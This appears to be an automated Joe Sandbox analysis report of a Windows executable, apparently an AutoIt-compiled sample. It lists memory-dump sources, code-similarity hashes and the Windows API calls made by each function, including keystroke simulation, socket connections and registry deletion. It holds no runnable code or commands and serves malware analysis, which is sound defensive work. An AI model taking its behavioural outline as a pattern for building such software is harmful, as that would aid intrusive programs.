                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                          • String ID: @
                                                          • API String ID: 3522835683-2766056989
                                                          • Opcode ID: e52ec2d1bbd00c3085a5f7adf9c7817899cc5275e41d44bea7f6a326bc997c04
                                                          • Instruction ID: c8120aef579a6c99a4a530475131d9adc08f4cbccafbb7c84e38df83f4197f63
                                                          • Opcode Fuzzy Hash: e52ec2d1bbd00c3085a5f7adf9c7817899cc5275e41d44bea7f6a326bc997c04
                                                          • Instruction Fuzzy Hash: B6619C71A006189FCF15DF68C881AAEB7B5FF49310F10807EE819AB791CB34AD45CB84
                                                          APIs
                                                          • GetParent.USER32(?), ref: 003F0F8C
                                                          • GetKeyboardState.USER32(?), ref: 003F0FA1
                                                          • SetKeyboardState.USER32(?), ref: 003F1002
                                                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 003F1030
                                                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 003F104F
                                                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 003F1095
                                                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003F10B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 0fb4c108f1d23f7c8e51c69ee9d14776fa408e915bd94078de101d27ea6f1684
                                                          • Instruction ID: b34f03e5c38fcbfe25bb272e25e5e8dbed60f961a8ab698db5fa0f621ac0382b
                                                          • Opcode Fuzzy Hash: 0fb4c108f1d23f7c8e51c69ee9d14776fa408e915bd94078de101d27ea6f1684
                                                          • Instruction Fuzzy Hash: C25115A05047DABDFB3742388C05BB6BFA95B06304F098589E3D5898D3C6D9DCC9D751
                                                          APIs
                                                          • GetParent.USER32(00000000), ref: 003F0DA5
                                                          • GetKeyboardState.USER32(?), ref: 003F0DBA
                                                          • SetKeyboardState.USER32(?), ref: 003F0E1B
                                                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 003F0E47
                                                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 003F0E64
                                                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003F0EA8
                                                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003F0EC9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessagePost$KeyboardState$Parent
                                                          • String ID:
                                                          • API String ID: 87235514-0
                                                          • Opcode ID: 7525f4d857464bab0a53045eca93a2d1709f5f3168655c615f5062696e0d86b3
                                                          • Instruction ID: c15f945bc78ec3c04f5fdfd4dc6e7fdf8e5c34457c596d2cd3a45138ca034a26
                                                          • Opcode Fuzzy Hash: 7525f4d857464bab0a53045eca93a2d1709f5f3168655c615f5062696e0d86b3
                                                          • Instruction Fuzzy Hash: 665109A06447D97DFB3B83788C45BBABFA95B06300F088899F2D45A8C3C395EC98D750
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _wcsncpy$LocalTime
                                                          • String ID:
                                                          • API String ID: 2945705084-0
                                                          • Opcode ID: c78992a299d426a1123de4fd563185437c7f40380326d18f257d15750b2b7b03
                                                          • Instruction ID: 448b279c29a89179733c3a1defba383cbef95e0c3ba2aee03141baf711a0c9ae
                                                          • Opcode Fuzzy Hash: c78992a299d426a1123de4fd563185437c7f40380326d18f257d15750b2b7b03
                                                          • Instruction Fuzzy Hash: 6041C265C1021876CB13FBF48C869DFB3B89F05314F508A66E718E7621EB34A245C7EA
                                                          APIs
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003ED5D4
                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003ED60A
                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003ED61B
                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003ED69D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: ,,B$DllGetClassObject
                                                          • API String ID: 753597075-3467126366
                                                          • Opcode ID: 4217aab0d9f5c0719a42e975aa6109c439ef880803ba5b39fd24554dd822b2f2
                                                          • Instruction ID: c66b0f14126cbff519f1a7f3347bcf3faeb8c3f3f11b27622346221a9b5c100e
                                                          • Opcode Fuzzy Hash: 4217aab0d9f5c0719a42e975aa6109c439ef880803ba5b39fd24554dd822b2f2
                                                          • Instruction Fuzzy Hash: 7441B1B1600264EFDB06CF65C884B9ABBB9EF44310F5582ADEC099F285D7B1DD44CBA4
                                                          APIs
                                                            • Part of subcall function 003F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003F3697,?), ref: 003F468B
                                                            • Part of subcall function 003F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003F3697,?), ref: 003F46A4
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 003F36B7
                                                          • _wcscmp.LIBCMT ref: 003F36D3
                                                          • MoveFileW.KERNEL32(?,?), ref: 003F36EB
                                                          • _wcscat.LIBCMT ref: 003F3733
                                                          • SHFileOperationW.SHELL32(?), ref: 003F379F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1377345388-1173974218
                                                          • Opcode ID: 8ef50c7c0a28f7fe525bd761bdfa18395e38df820d4fb806e20015bbabf5c5aa
                                                          • Instruction ID: 27ecab3429fda8535884ff94686ccf0da25dba775d7f156610ceaadef3cdfa70
                                                          • Opcode Fuzzy Hash: 8ef50c7c0a28f7fe525bd761bdfa18395e38df820d4fb806e20015bbabf5c5aa
                                                          • Instruction Fuzzy Hash: FA418171508348AECB53EF64C4819EF77E8AF89340F00092EB599C7251EB34D689C756
                                                          APIs
                                                          • _memset.LIBCMT ref: 004172AA
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00417351
                                                          • IsMenu.USER32(?), ref: 00417369
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004173B1
                                                          • DrawMenuBar.USER32 ref: 004173C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$DrawInfoInsert_memset
                                                          • String ID: 0
                                                          • API String ID: 3866635326-4108050209
                                                          • Opcode ID: 72465eecb09dea97b0d3974d146d7be0630631b17a4c300311d3282cd40f6c9c
                                                          • Instruction ID: a99a7b4267a95c70056ab1001fa84c567c97cda7025e336fec5d5d6609e434cd
                                                          • Opcode Fuzzy Hash: 72465eecb09dea97b0d3974d146d7be0630631b17a4c300311d3282cd40f6c9c
                                                          • Instruction Fuzzy Hash: EE411575A04208EFDB20DF50D884AEABBB9FB08350F14852AFD25AB351D734AD94DB64
                                                          APIs
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00410FD4
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00410FFE
                                                          • FreeLibrary.KERNEL32(00000000), ref: 004110B5
                                                            • Part of subcall function 00410FA5: RegCloseKey.ADVAPI32(?), ref: 0041101B
                                                            • Part of subcall function 00410FA5: FreeLibrary.KERNEL32(?), ref: 0041106D
                                                            • Part of subcall function 00410FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00411090
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00411058
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                          • String ID:
                                                          • API String ID: 395352322-0
                                                          • Opcode ID: c2e81f4e32abc946d585cc505f185532d547fecd10449d94fa285b1404e7c51f
                                                          • Instruction ID: f503855bb679a8bb7d6c34fb5f58ee53208db7190efc0b2b7264ddc01d2cc128
                                                          • Opcode Fuzzy Hash: c2e81f4e32abc946d585cc505f185532d547fecd10449d94fa285b1404e7c51f
                                                          • Instruction Fuzzy Hash: 4531EA71D01109BFDB15DF90DC89AFFBBBCEB08300F00416AE605A2651D7749E8A9AA8
                                                          APIs
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004162EC
                                                          • GetWindowLongW.USER32(012E61C0,000000F0), ref: 0041631F
                                                          • GetWindowLongW.USER32(012E61C0,000000F0), ref: 00416354
                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00416386
                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004163B0
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 004163C1
                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004163DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: LongWindow$MessageSend
                                                          • String ID:
                                                          • API String ID: 2178440468-0
                                                          • Opcode ID: 467da85e65bb3dc64c1139dd062e3557f6b5c52ef844b102daeb67d6791228f5
                                                          • Instruction ID: f67943887840f96158da433444fbe8e928577c3e17945a7d4da33308a9900592
                                                          • Opcode Fuzzy Hash: 467da85e65bb3dc64c1139dd062e3557f6b5c52ef844b102daeb67d6791228f5
                                                          • Instruction Fuzzy Hash: 913113306402449FDB20DF19EC84FA937E1BB4A715F1A41B9F9208B3B2CB75E8858B59
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003EDB2E
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003EDB54
                                                          • SysAllocString.OLEAUT32(00000000), ref: 003EDB57
                                                          • SysAllocString.OLEAUT32(?), ref: 003EDB75
                                                          • SysFreeString.OLEAUT32(?), ref: 003EDB7E
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 003EDBA3
                                                          • SysAllocString.OLEAUT32(?), ref: 003EDBB1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: 81383252a411bc76cfdbbe2e3b065119fea2ed29dcfe7b66966246e9517cd9e3
                                                          • Instruction ID: d4257903ed0c81451bca8403a2b8c991546490375c8f5702d9ddbc8584cb77d4
                                                          • Opcode Fuzzy Hash: 81383252a411bc76cfdbbe2e3b065119fea2ed29dcfe7b66966246e9517cd9e3
                                                          • Instruction Fuzzy Hash: 7521A73660022AAFDF11DFA9DC84CFB73ACEB09360B018635F914DB290E670DC458764
                                                          APIs
                                                            • Part of subcall function 00407D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00407DB6
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004061C6
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004061D5
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0040620E
                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00406217
                                                          • WSAGetLastError.WSOCK32 ref: 00406221
                                                          • closesocket.WSOCK32(00000000), ref: 0040624A
                                                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00406263
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 910771015-0
                                                          • Opcode ID: 74e52acf2646dc6c2e9a4ee865c7dcbc8271ff8414924b125ee169dc9d961656
                                                          • Instruction ID: c3d0e1110f1c93db37efedea555dd212f31a7502fea7cf2f4b9f272474be18e2
                                                          • Opcode Fuzzy Hash: 74e52acf2646dc6c2e9a4ee865c7dcbc8271ff8414924b125ee169dc9d961656
                                                          • Instruction Fuzzy Hash: 4331B031600108ABDF10AF64CC85BBA77A9EF45760F05807EFD06AB2D1DB78AC158AA5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                          • API String ID: 1038674560-2734436370
                                                          • Opcode ID: d28dd880e5ed3b54e3268ddfbf8c98fee0968c78f483fcfd9e6b1968969e48c6
                                                          • Instruction ID: cc9192e000dcb659d57808c1f60d35886aa2e2b9b0b035e397a78c53875eb050
                                                          • Opcode Fuzzy Hash: d28dd880e5ed3b54e3268ddfbf8c98fee0968c78f483fcfd9e6b1968969e48c6
                                                          • Instruction Fuzzy Hash: 212164722045B16FD623AA36AC03FE77398EF55384F51423AF9428B4D1EBE09D81C294
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003EDC09
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003EDC2F
                                                          • SysAllocString.OLEAUT32(00000000), ref: 003EDC32
                                                          • SysAllocString.OLEAUT32 ref: 003EDC53
                                                          • SysFreeString.OLEAUT32 ref: 003EDC5C
                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 003EDC76
                                                          • SysAllocString.OLEAUT32(?), ref: 003EDC84
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                          • String ID:
                                                          • API String ID: 3761583154-0
                                                          • Opcode ID: bbc5eb820cde27832a1f0b223d92d1c28f03a299bf01ae04adb45b1040ca3b0f
                                                          • Instruction ID: 9bd7fe6de879c10cfb9b54ecdfebdb3761f9207b10e4102e6a998e72e4e4ad90
                                                          • Opcode Fuzzy Hash: bbc5eb820cde27832a1f0b223d92d1c28f03a299bf01ae04adb45b1040ca3b0f
                                                          • Instruction Fuzzy Hash: 47218335604254AFAB15EFA9DC88DEB77ECEB08360B11C235F914CB2A0DAB0EC45C764
                                                          APIs
                                                            • Part of subcall function 00391D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00391D73
                                                            • Part of subcall function 00391D35: GetStockObject.GDI32(00000011), ref: 00391D87
                                                            • Part of subcall function 00391D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00391D91
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00417632
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0041763F
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0041764A
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00417659
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00417665
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: 307711a4d32a886181025c5ef6471cb3fa52964900d8128f30ae3ae50a373695
                                                          • Instruction ID: beea113abd7d188600cd91840784c4577053fd1bd9996940d5aa5f40b5aed945
                                                          • Opcode Fuzzy Hash: 307711a4d32a886181025c5ef6471cb3fa52964900d8128f30ae3ae50a373695
                                                          • Instruction Fuzzy Hash: C611B6B1150219BFEF118F64CC85EE77F6DEF087A8F114115B604A6050C7769C62DBA4
                                                          APIs
                                                          • __init_pointers.LIBCMT ref: 003B9AE6
                                                            • Part of subcall function 003B3187: EncodePointer.KERNEL32(00000000), ref: 003B318A
                                                            • Part of subcall function 003B3187: __initp_misc_winsig.LIBCMT ref: 003B31A5
                                                            • Part of subcall function 003B3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003B9EA0
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003B9EB4
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003B9EC7
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003B9EDA
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003B9EED
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003B9F00
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003B9F13
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003B9F26
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003B9F39
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003B9F4C
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003B9F5F
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003B9F72
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003B9F85
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003B9F98
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003B9FAB
                                                            • Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003B9FBE
                                                          • __mtinitlocks.LIBCMT ref: 003B9AEB
                                                          • __mtterm.LIBCMT ref: 003B9AF4
                                                            • Part of subcall function 003B9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003B9AF9,003B7CD0,0044A0B8,00000014), ref: 003B9C56
                                                            • Part of subcall function 003B9B5C: _free.LIBCMT ref: 003B9C5D
                                                            • Part of subcall function 003B9B5C: DeleteCriticalSection.KERNEL32(02E,?,?,003B9AF9,003B7CD0,0044A0B8,00000014), ref: 003B9C7F
                                                          • __calloc_crt.LIBCMT ref: 003B9B19
                                                          • __initptd.LIBCMT ref: 003B9B3B
                                                          • GetCurrentThreadId.KERNEL32 ref: 003B9B42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
